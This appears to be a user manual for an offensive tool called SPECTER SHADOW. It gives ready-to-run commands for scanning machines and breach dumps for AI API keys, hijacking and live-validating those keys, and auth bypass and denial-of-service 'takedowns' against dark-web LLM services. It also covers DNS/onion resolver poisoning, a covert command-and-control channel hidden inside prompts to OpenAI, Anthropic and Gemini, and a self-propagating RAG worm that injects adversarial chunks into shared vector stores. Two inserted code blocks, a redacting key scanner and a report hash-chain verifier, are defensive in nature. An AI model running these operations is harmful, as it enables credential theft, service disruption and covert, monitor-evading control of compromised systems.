SPECTER SHADOW
T87 · v1.0.0 · Dark Web & Shadow AI Attack Engine
SPECTER SHADOW hunts unauthorised AI deployments on your network and attacks dark web AI infrastructure via Tor. Eight subsystems span shadow AI detection, dark web enumeration, marketplace exploitation, covert C2, resolver poisoning, RAG worm propagation, breach intelligence, and signed reporting.
What is SPECTER SHADOW
Shadow AI — employees spinning up personal AI deployments using their own API keys or running unapproved LLM wrappers on internal servers — represents one of the fastest-growing attack surfaces in enterprise environments. SPECTER SHADOW operationalises this attack surface: it detects shadow AI, validates the keys, and demonstrates the full exploitation chain.
The second mission is the dark web AI ecosystem. Uncensored LLM marketplaces (WormGPT, FraudGPT, DarkGPT) operate as criminal-as-a-service platforms on Tor. SPECTER SHADOW enumerates them, probes their auth and censorship controls, and, at the DESTROY gate, can execute targeted degradation operations.
All findings are captured in Ed25519-signed SHD-{hex12} reports with SHA-256 hash-chained evidence suitable for use in security assessments and legal proceedings.
Installation
# Clone the repository (private — requires authorisation)
git clone https://github.com/RichardBarron27/red-specter-specter-shadow
cd red-specter-specter-shadow
# Install in editable mode (Python 3.11+)
pip install -e .
# Verify installation
specter-shadow --version
# Generate signing keypair
specter-shadow pubkey
Dependencies
| Package | Version | Purpose |
|---|---|---|
| typer | ≥0.12.0 | CLI framework |
| httpx | ≥0.27.0 | HTTP requests (GHOST, BAZAAR, HARVEST, CONDUIT) |
| stem | ≥1.8.2 | Tor circuit management (DESCENT) |
| cryptography | ≥42.0.0 | Ed25519 signing (REPORT) |
| pydantic | ≥2.6.0 | Data models and validation |
| rich | ≥13.7.0 | CLI output rendering |
Quickstart
# 1. Scan for shadow AI keys in home directory (PASSIVE gate — no authorisation needed)
specter-shadow ghost scan --home
# 2. Parse a breach dump for credentials and API keys
specter-shadow harvest parse breach.txt
# 3. Enumerate dark web AI services via Tor (OPEN gate)
specter-shadow descent enum --tor-host 127.0.0.1 --tor-port 9050 --gate OPEN
# 4. Validate discovered keys against live endpoints (INJECT gate — requires scope file)
specter-shadow harvest validate findings.json --gate INJECT --scope shadow_scope.json
8 Subsystems
SPECTER SHADOW is composed of 8 subsystems, each independently invocable via the CLI.
Gate requirements are enforced at runtime — attempting a higher-gate operation without
a valid scope file raises GateError.
| ID | Subsystem | Minimum Gate | Purpose |
|---|---|---|---|
| SS-01 | GHOST | PASSIVE / INJECT | Shadow AI key detection and hijacking |
| SS-02 | DESCENT | OPEN | Tor circuit and dark web AI enumeration |
| SS-03 | BAZAAR | INJECT / DESTROY | Dark web LLM marketplace exploitation |
| SS-04 | CONDUIT | DESTROY | 3-provider XOR secret-sharing C2 mesh |
| SS-05 | RESOLVER | INJECT | Onion-resolver poisoning (7 templates) |
| SS-06 | CORPUS | DESTROY | Self-propagating RAG worm (CVE-2026-52001) |
| SS-07 | HARVEST | PASSIVE / INJECT | Breach dump parsing and live key validation |
| SS-08 | REPORT | PASSIVE | Ed25519-signed SHD-{hex12} report generation |
Gate System
SPECTER SHADOW uses a 4-level gate system. Gate levels are ordered and inclusive: DESTROY access implies INJECT, OPEN, and PASSIVE access.
| Gate | Value | Description |
|---|---|---|
| PASSIVE | 0 | Local detection only — no outbound connections to targets |
| OPEN | 1 | Read-only network access via Tor — enumerate, do not modify |
| INJECT | 2 | Active exploitation — key validation, auth bypass, resolver injection |
| DESTROY | 3 | Destructive operations — takedown, C2, RAG worm injection |
--scope.
Attempting these gates without a scope file raises GateError with exit code 1.
Scope File
{
"target": "example.onion",
"operator": "red-team-op-007",
"gate": "INJECT",
"unleashed_inject": true,
"unleashed_destroy": false,
"authorised_by": "Richard B.",
"engagement_id": "ENG-2026-001"
}
SS-01: GHOST — Shadow AI Detection
GHOST scans the local environment for API keys belonging to 14 AI providers.
It searches environment variables (current process, system-wide /etc/environment,
XDG config paths), configuration files (shell profiles, .env files, Docker configs,
Kubernetes manifests, IDE settings), and proxy log content strings.
Supported Providers
OpenAI (sk-), Anthropic (sk-ant-api), Google AI (AIzaSy),
HuggingFace (hf_), Cohere (co-), Mistral (mist-),
Groq (gsk_), Together (tog-), Replicate (r8_),
Perplexity (pplx-), OpenRouter (sk-or-), AWS Bedrock
(AKIA), Azure OpenAI (endpoint + key pattern), Fireworks (fw-).
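For auditing your own configuration files against the prefixes listed above, here is an added example (not SPECTER SHADOW's code) that reports matches in redacted form only. The 16-character minimum token length, the token character set, and the names `scan_text` and `redact` are assumptions made for this example.

```python
import re

# Prefixes exactly as listed on this page. Azure OpenAI is left out because the
# page gives no literal prefix for it ("endpoint + key pattern").
PREFIXES = {
    "sk-ant-api": "Anthropic", "sk-or-": "OpenRouter", "sk-": "OpenAI",
    "AIzaSy": "Google AI", "hf_": "HuggingFace", "co-": "Cohere",
    "mist-": "Mistral", "gsk_": "Groq", "tog-": "Together", "r8_": "Replicate",
    "pplx-": "Perplexity", "AKIA": "AWS Bedrock", "fw-": "Fireworks",
}

# Longest prefix first, so "sk-ant-api..." is not reported as OpenAI ("sk-").
_ORDERED = sorted(PREFIXES, key=len, reverse=True)
# Assumption: a key is a prefix at a token start plus >= 16 token characters.
_KEY = re.compile(
    r"(?<![A-Za-z0-9_-])(" + "|".join(map(re.escape, _ORDERED)) + r")[A-Za-z0-9_-]{16,}"
)

def redact(key, prefix):
    """Keep only the prefix and the last 4 characters of the secret."""
    return f"{prefix}***{key[-4:]}"

def scan_text(text, source="<memory>"):
    """Return one redacted finding per key-shaped token, with source and line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in _KEY.finditer(line):
            findings.append({
                "source": source,
                "line": lineno,
                "provider": PREFIXES[m.group(1)],
                "redacted": redact(m.group(0), m.group(1)),
            })
    return findings

# Constructed sample (not real keys): a .env-style file with three key-shaped values.
SAMPLE = """\
export OPENAI_API_KEY=sk-CONSTRUCTEDexample0000000001
ANTHROPIC_API_KEY="sk-ant-api03-CONSTRUCTEDexample0002"
LOG_PREFIX=task-runner-configuration-defaults
HF_TOKEN=hf_CONSTRUCTEDexampleToken0003
"""

if __name__ == "__main__":
    for finding in scan_text(SAMPLE, ".env"):
        print(finding)
```

Short prefixes such as `co-` and `fw-` will also match ordinary hyphenated identifiers of sufficient length, so treat hits as candidates for review and rotation rather than confirmed secrets.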
CLI: ghost scan
# Scan current user's home directory config files
specter-shadow ghost scan --home
# Scan additional paths (files, not directories)
specter-shadow ghost scan --home --extra /etc/environment /opt/app/.env
# Scan proxy log content for API key patterns
specter-shadow ghost scan --proxy-log /var/log/squid/access.log
CLI: ghost hijack
# Hijack a discovered key (INJECT gate required)
specter-shadow ghost hijack --key OPENAI_API_KEY --provider openai --gate INJECT --scope shadow_scope.json
SS-02: DESCENT — Dark Web Enumeration
DESCENT establishes a Tor circuit via stem and enumerates known dark web AI service endpoints. It probes each .onion address for HTTP responses, extracts service titles, and classifies each service by type.
Service Types
| Type | Description | Examples |
|---|---|---|
| UNCENSORED_LLM | Uncensored language model services | WormGPT, DarkGPT |
| LLM_MARKETPLACE | Multi-model API resellers | FraudGPT, EvilGPT |
| AI_TOOLING | Hacking tools powered by AI | AI phishing kits |
| CREDENTIAL_STORE | Credential and key markets | API key dumps |
| UNKNOWN | Unclassified AI-adjacent service | — |
CLI: descent enum
# Enumerate dark web AI services via local Tor (OPEN gate)
specter-shadow descent enum --tor-host 127.0.0.1 --tor-port 9050 --gate OPEN
# Use custom control port and password
specter-shadow descent enum --control-port 9051 --control-password "your-password" --gate OPEN
SS-03: BAZAAR — Dark Web Exploitation
BAZAAR exploits discovered dark web LLM services. BazaarExploiter probes
for authentication bypass, censorship evasion, and rate-limit characterisation.
BazaarTakedown (DESTROY gate) measures baseline latency then executes
congestion injection to degrade service availability.
Auth Bypass Techniques
7 techniques tested in sequence: header smuggling, parameter injection, token manipulation, cache poisoning, endpoint enumeration, credential stuffing, session fixation.
CLI: bazaar
# Probe a dark web service for auth bypass (INJECT gate)
specter-shadow bazaar exploit --service wormgpt --gate INJECT --scope shadow_scope.json
# DESTROY-gated takedown (measures baseline then degrades)
specter-shadow bazaar takedown --service http://wgpt4example.onion --gate DESTROY --scope shadow_scope.json
SS-04: CONDUIT — XOR C2 Mesh
CONDUIT implements a covert command-and-control channel over three AI provider APIs. Commands are split into 3 shares using XOR secret sharing with per-provider derived keys. Each share is embedded as a benign-looking prompt to OpenAI, Anthropic, or Gemini. The traffic is cryptographically indistinguishable from normal AI API usage.
XOR Secret Sharing Protocol
Given command C, random padding P, and per-provider derived keys K0, K1, K2:
padded = C + P # pad to block boundary
share0 = padded XOR K0
share1 = padded XOR K1
share2 = padded XOR K2 XOR K0 XOR K1 # reconstruction share
recover = share0 XOR share1 XOR share2 # recovers padded
C = strip_padding(recover)
Each share is embedded in a natural-language prompt context using
embed_in_prompt(share, provider, index) before transmission.
The SOCKS proxy from the Tor circuit is applied to all three HTTP connections.
CLI: conduit send
# Send command via C2 mesh (DESTROY gate, all 3 provider API keys required)
specter-shadow conduit send "EXECUTE: enumerate targets" --gate DESTROY --scope shadow_scope.json
# Verify C2 channel health
specter-shadow conduit verify --gate DESTROY --scope shadow_scope.json
Requires the OPENAI_API_KEY, ANTHROPIC_API_KEY, and
GOOGLE_API_KEY environment variables. Missing keys raise ShadowError.
SS-05: RESOLVER — Onion Resolver Poisoning
RESOLVER crafts malicious DNS-over-HTTPS responses targeting onion-resolver infrastructure used by AI agents. 7 injection templates are available.
Injection Templates
| Template | Description |
|---|---|
| dns_rebind | DNS rebinding — redirect .onion resolution mid-connection |
| ttl_manipulation | Artificially short TTL to force frequent re-resolution |
| wildcard_poison | Wildcard record injection to capture all subdomains |
| negative_cache_flood | NXDOMAIN flood to cache denial for legitimate records |
| cache_detonation | Mass TTL expiry to force simultaneous re-resolution storm |
| nxdomain_hijack | Convert NXDOMAIN to attacker-controlled A record |
| authority_spoof | Inject fake NS records pointing to attacker resolver |
CLI: resolver craft
# Craft a dns_rebind payload (INJECT gate)
specter-shadow resolver craft --target ai.example.onion --template dns_rebind --gate INJECT
# List all available templates
specter-shadow resolver craft --list-templates
SS-06: CORPUS — Self-Propagating RAG Worm
CORPUS implements the CVE-2026-52001 RAG worm propagation technique.
Adversarial document chunks are crafted to embed propagation instructions
that corrupt adjacent retrieval context in shared vector stores.
With branch_factor=3 and max_generations=4,
a single injected document can corrupt up to 81 downstream chunks.
CLI: corpus
# Craft a propagating worm document (DESTROY gate)
specter-shadow corpus craft --topic "AI safety compliance guidelines" --gate DESTROY
# Inject into target RAG store (DESTROY gate)
specter-shadow corpus inject --endpoint http://rag.internal/ingest --worm worm.json --gate DESTROY
SS-07: HARVEST — Breach Intelligence
HARVEST provides a complete breach data processing pipeline. HarvestExtractor
parses breach dumps line-by-line using regex patterns for 14 AI provider key formats,
email addresses (corporate and personal), and password hashes.
CredentialValidator (INJECT gate) validates discovered API keys against
live provider endpoints. ExposureScorer calculates weighted exposure scores.
Extraction Patterns
| Type | Pattern | Score Weight |
|---|---|---|
| Live API key | Provider-specific prefixes | 25 (after validation) |
| Unvalidated API key | Provider-specific prefixes | 8 |
| Corporate email | @domain.tld where domain ≠ gmail/yahoo/etc. | 5 |
| Personal email | @gmail.com, @yahoo.com, etc. | 1.5 |
| Password hash | bcrypt $2b$, MD5 $1$, SHA $5$/$6$ | 2 |
Severity Thresholds
| Severity | Score |
|---|---|
| CRITICAL | ≥ 75 |
| HIGH | ≥ 50 |
| MEDIUM | ≥ 25 |
| LOW | ≥ 10 |
CLI: harvest
# Parse a breach dump (PASSIVE gate — no network connections)
specter-shadow harvest parse breach-dump.txt
# Validate extracted keys against live endpoints (INJECT gate)
specter-shadow harvest validate findings.json --gate INJECT --scope shadow_scope.json
# Score findings for exposure severity
specter-shadow harvest score findings.json
SHD Report Format
All SPECTER SHADOW operations produce a SHD-{hex12} JSON report. The report ID is generated from 6 random bytes encoded as 12 lowercase hex characters.
{
"report_id": "SHD-a3f2c1d4e5b6",
"target": "example.onion",
"gate": "INJECT",
"timestamp": "2026-05-15T12:34:56Z",
"exposure_score": 87.5,
"severity": "CRITICAL",
"findings": [
{
"finding_id": "SHD-a3f2c1d4e5b6-F001",
"subsystem": "GHOST",
"title": "Live OpenAI API Key in Shell Profile",
"severity": "CRITICAL",
"description": "sk-***... found in /home/user/.zshrc",
"evidence": "OPENAI_API_KEY=sk-abc... (validated: 200 OK)",
"hash": "sha256:3f7a..."
}
],
"subsystem_summaries": [...],
"signature": "hex-encoded Ed25519 signature",
"public_key_pem": "-----BEGIN PUBLIC KEY-----..."
}
Ed25519 Signing
Reports are signed using Ed25519 (RFC 8032). The signing key is generated at install
time and stored in the tool's data directory. The public key can be retrieved with
specter-shadow pubkey and distributed for report verification.
Evidence Chain
Each finding includes a SHA-256 hash of its content. The hash chain links each finding
to its predecessor: chain_hash = SHA-256(prev_hash + finding_bytes).
This ensures findings cannot be added, removed, or reordered without detection.
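A recipient can check the chain described above independently. The following added example (not the project's own code) recomputes chain_hash = SHA-256(prev_hash + finding_bytes) and reports the first broken link. It assumes an empty prev_hash for the first finding, raw digest bytes for prev_hash, and sorted-key compact JSON (without the hash field) as finding_bytes; the page specifies none of these, and Ed25519 signature verification is not shown.

```python
import hashlib
import json
from typing import Optional

GENESIS = b""  # assumption: the first finding chains from an empty prev_hash

def finding_bytes(finding: dict) -> bytes:
    """Assumed canonical form: sorted-key compact JSON without the hash field."""
    body = {k: v for k, v in finding.items() if k != "hash"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()

def chain_hash(prev_hash: bytes, finding: dict) -> bytes:
    # chain_hash = SHA-256(prev_hash + finding_bytes), as stated on the page
    return hashlib.sha256(prev_hash + finding_bytes(finding)).digest()

def seal(findings: list) -> list:
    """Return copies of the findings with a chained 'hash' field attached."""
    prev, sealed = GENESIS, []
    for f in findings:
        prev = chain_hash(prev, f)
        sealed.append({**f, "hash": "sha256:" + prev.hex()})
    return sealed

def verify(findings: list) -> Optional[int]:
    """Return None if every link checks out, else the index of the first bad one."""
    prev = GENESIS
    for i, f in enumerate(findings):
        expected = chain_hash(prev, f)
        if f.get("hash") != "sha256:" + expected.hex():
            return i
        prev = expected
    return None

# Constructed sample findings (not real tool output).
SAMPLE = seal([
    {"finding_id": "SHD-000000000000-F001", "subsystem": "GHOST", "title": "constructed A"},
    {"finding_id": "SHD-000000000000-F002", "subsystem": "HARVEST", "title": "constructed B"},
    {"finding_id": "SHD-000000000000-F003", "subsystem": "GHOST", "title": "constructed C"},
])

if __name__ == "__main__":
    print("intact:", verify(SAMPLE))
    print("reordered:", verify([SAMPLE[1], SAMPLE[0], SAMPLE[2]]))
    print("middle removed:", verify([SAMPLE[0], SAMPLE[2]]))
    print("tail removed:", verify(SAMPLE[:2]))
```

Removing findings from the end leaves a shorter chain that still verifies, so tail truncation is only caught if the signature covers the full findings list or its final hash.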
Environment Variables
| Variable | Subsystem | Purpose |
|---|---|---|
| OPENAI_API_KEY | CONDUIT | OpenAI provider for C2 mesh |
| ANTHROPIC_API_KEY | CONDUIT | Anthropic provider for C2 mesh |
| GOOGLE_API_KEY | CONDUIT | Gemini provider for C2 mesh |
| TOR_SOCKS_HOST | DESCENT | Tor SOCKS proxy host (default: 127.0.0.1) |
| TOR_SOCKS_PORT | DESCENT | Tor SOCKS proxy port (default: 9050) |
| TOR_CONTROL_PORT | DESCENT | Tor control port (default: 9051) |
| SHADOW_SIGNING_KEY | REPORT | Path to Ed25519 private key PEM |
MITRE Mapping
| Technique | ID | Subsystem |
|---|---|---|
| Valid Accounts | T1078 | GHOST, HARVEST |
| Adversary-in-the-Middle | T1557 | RESOLVER |
| Application Layer Protocol | T1071 | CONDUIT |
| Data from Cloud Storage | T1530 | HARVEST |
| Network Denial of Service | T1498 | BAZAAR (takedown) |
| LLM Prompt Injection | ATLAS AML.T0054 | CORPUS |
| Discover AI Artifacts | ATLAS AML.T0007 | GHOST, DESCENT |
| Craft Adversarial Data | ATLAS AML.T0043 | CORPUS, RESOLVER |